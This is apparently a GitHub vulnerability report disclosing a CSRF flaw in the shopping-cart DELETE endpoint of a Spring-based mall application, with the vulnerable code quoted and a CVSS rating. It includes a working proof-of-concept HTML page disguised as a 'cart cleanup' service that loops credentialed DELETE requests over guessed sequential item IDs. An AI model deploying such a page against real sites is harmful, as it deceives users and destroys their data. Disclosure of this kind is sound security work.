
CSRF Vulnerability in Shopping Cart Item Deletion #112

@flashzyc


CSRF Vulnerability in Shopping Cart Item Deletion

Summary

A CSRF vulnerability exists in the shopping cart deletion endpoint /shop-cart/{cartItemId} (DELETE). Attackers can empty users' shopping carts, causing inconvenience and potential loss of carefully curated selections.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired
    private HandlerInterceptor newBeeMallLoginInterceptor; // the project's login interceptor bean (typed via the Spring interface here)
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor) // only checks that a session user exists
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF token validation
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 93-105)

@DeleteMapping("/shop-cart/{newBeeMallShoppingCartItemId}")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@PathVariable("newBeeMallShoppingCartItemId") Long newBeeMallShoppingCartItemId,
                                               HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Cart item IDs are sequential and predictable
    Boolean deleteResult = newBeeMallShoppingCartService.deleteById(newBeeMallShoppingCartItemId, user.getUserId());
    if (deleteResult) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(ServiceResultEnum.OPERATE_ERROR.getResult());
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ Cart item IDs are predictable (sequential integers)
  3. ⚠️ Can delete multiple items in batch

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Cart Cleanup Service</title>
</head>
<body>
    <h2>🧹 Cleaning expired items from cart...</h2>
    <div id="progress">Processing...</div>
    
    <script>
        // Delete cart items by guessing sequential IDs
        var deletedCount = 0;
        
        for (var i = 1; i <= 100; i++) {
            fetch('http://localhost:28089/shop-cart/' + i, {
                method: 'DELETE',
                credentials: 'include'
            })
            .then(response => response.json())
            .then(data => {
                if (data.resultCode == 200) {
                    deletedCount++;
                    document.getElementById('progress').innerHTML =
                        'Removed ' + deletedCount + ' expired items';
                }
            })
            .catch(function () { /* ignore requests that fail or are blocked */ });
        }
        
        setTimeout(function() {
            document.getElementById('progress').innerHTML = '✅ Cart cleanup complete!';
        }, 3000);
    </script>
</body>
</html>

Impact

Shopping cart emptying causes user inconvenience: users lose their saved shopping selections and must recreate their carts, leading to frustration and potential business loss.


CVSS Score: 5.3 (Medium)
